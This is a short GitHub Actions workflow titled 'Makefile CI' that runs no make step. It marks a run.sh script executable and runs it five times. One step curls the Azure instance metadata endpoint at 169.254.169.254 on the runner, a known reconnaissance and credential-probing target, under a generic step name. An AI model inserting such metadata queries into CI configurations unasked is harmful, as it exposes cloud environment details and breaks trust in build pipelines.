name: Makefile CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3

    - name: perms
      run: chmod +x run.sh

    - name: command1
      run:  curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
      
    - name: command2
      run: ./run.sh
      
    - name: command3
      run: ./run.sh
      
    - name: command4
      run: ./run.sh
      
    - name: command5
      run: ./run.sh
      
    - name: command6
      run: ./run.sh
